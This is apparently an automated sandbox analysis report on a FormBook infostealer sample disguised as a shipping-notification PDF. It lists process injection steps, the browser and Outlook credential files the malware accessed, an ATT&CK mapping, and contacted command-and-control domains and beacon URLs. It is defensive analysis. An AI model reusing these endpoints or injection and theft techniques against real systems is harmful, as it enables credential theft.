            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sort.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\sort.exeThread register set: target process: 3312Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\sort.exeThread APC queued: target process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AAB008Jump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeProcess created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: shipping notification_pdf.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\sort.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520196 Sample: shipping notification_pdf.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 28 www.softillery.info 2->28 30 www.consultarfacil.online 2->30 32 12 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 5 other signatures 2->48 10 shipping notification_pdf.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 AVyNLNHPrma.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sort.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 AVyNLNHPrma.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.priunit.online 162.0.238.238, 54973, 54974, 54975 NAMECHEAP-NETUS Canada 22->34 36 www.nmh6.site 43.154.104.247, 54957, 54958, 54959 LILLY-ASUS Japan 22->36 38 5 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            shipping notification_pdf.exe32%ReversingLabsWin32.Trojan.Generic
            shipping notification_pdf.exe100%AviraHEUR/AGEN.1321671
            shipping notification_pdf.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.exhibitarrange.shop/yxqi/0%Avira URL Cloudsafe
            http://www.skystargazeguide.store/jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd00%Avira URL Cloudsafe
            http://www.skystargazeguide.store/jnnq/0%Avira URL Cloudsafe
            http://www.asiapartnars.online/43nw/0%Avira URL Cloudsafe
            http://www.softillery.info/05bk/0%Avira URL Cloudsafe
            http://www.asiapartnars.online/43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.consultarfacil.online/f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER60%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            http://www.antura.partners/w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd00%Avira URL Cloudsafe
            http://www.priunit.online/orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd00%Avira URL Cloudsafe
            http://www.consultarfacil.online/f1ix/0%Avira URL Cloudsafe
            http://www.priunit.online/orig/0%Avira URL Cloudsafe
            http://www.exhibitarrange.shop0%Avira URL Cloudsafe
            http://www.sapatarias.online/3632/0%Avira URL Cloudsafe
            http://www.nmh6.site/aqh8/0%Avira URL Cloudsafe
            http://www.sapatarias.online/3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd00%Avira URL Cloudsafe
            http://www.antura.partners/sk-logabpstatus.php?a=K3ZvUk8rMHZ6cWJBTjJIV04zS2R2RnBlczJZWldicnJFSmlpMmp0%Avira URL Cloudsafe
            http://www.nmh6.site/aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd00%Avira URL Cloudsafe
            http://www.antura.partners/px.js?ch=10%Avira URL Cloudsafe
            http://www.softillery.info/05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd00%Avira URL Cloudsafe
            http://www.antura.partners/px.js?ch=20%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.antura.partners
            		208.91.197.27
            		truefalse
              		unknown
              www.nmh6.site
              		43.154.104.247
              		truefalse
                		unknown
                softillery.info
                		3.33.130.190
                		truefalse
                  		unknown
                  www.skystargazeguide.store
                  		38.180.87.102
                  		truefalse
                    		unknown
                    www.sapatarias.online
                    		13.248.169.48
                    		truefalse
                      		unknown
                      asiapartnars.online
                      		3.33.130.190
                      		truefalse
                        		unknown
                        www.priunit.online
                        		162.0.238.238
                        		truefalse
                          		unknown
                          www.exhibitarrange.shop
                          		34.76.205.124
                          		truefalse
                            		unknown
                            consultarfacil.online
                            		3.33.130.190
                            		truefalse
                              		unknown
                              www.48vlu.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                www.consultarfacil.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  18.31.95.13.in-addr.arpa
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.asiapartnars.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.softillery.info
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.skystargazeguide.store/jnnq/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.exhibitarrange.shop/yxqi/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.asiapartnars.online/43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTyfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.skystargazeguide.store/jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.asiapartnars.online/43nw/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.softillery.info/05bk/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.consultarfacil.online/f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.antura.partners/w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.priunit.online/orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.priunit.online/orig/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.consultarfacil.online/f1ix/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nmh6.site/aqh8/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sapatarias.online/3632/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nmh6.site/aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sapatarias.online/3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        		unknown
